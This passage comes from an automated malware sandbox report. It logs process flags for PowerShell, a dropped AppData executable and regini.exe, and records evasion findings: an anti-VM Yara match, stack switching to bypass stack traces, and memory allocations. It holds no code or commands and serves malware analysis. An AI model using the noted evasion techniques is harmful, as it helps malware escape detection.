                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: C6Abn5cBei.exe PID: 2916, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zdDlscHlw.exe PID: 2884, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: 7400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: 6C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: 8400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: 9400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
